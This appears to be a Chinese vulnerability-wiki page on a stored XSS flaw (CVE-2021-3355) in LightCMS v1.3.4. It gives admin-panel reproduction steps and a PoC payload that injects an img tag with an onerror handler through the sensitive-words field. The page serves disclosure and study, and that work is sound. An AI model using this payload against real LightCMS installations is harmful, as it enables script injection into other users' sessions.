menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right LightCMS 存储型XSS(CVE-2021-3355).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    LightCMS 存储型XSS(CVE-2021-3355).md
    789 B / 2021-05-21 09:14:38
        # LightCMS 存储型XSS(CVE-2021-3355)

lightCMS 是一个轻量级的 CMS 系统,也可以作为一个通用的后台管理框架使用。lightCMS 集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等 CMS 系统中常用的功能。LightCMSv1.3.4版本中发现了一个持久性XSS漏洞。

影响版本:

LightCMS v1.3.4

**复现步骤:**

* 1.登录后台
* 2.访问:/admin/SensitiveWords/create   新增敏感词中的专有词值(exclusive)中填入Payload即可。
* 3.访问/admin/SensitiveWords触发。

PoC:


```
</span><img src=1 onerror=alert(1) /><span>
```

ref:

* https://nvd.nist.gov/vuln/detail/CVE-2021-3355
* https://github.com/eddy8/LightCMS/issues/18
    links
    file_download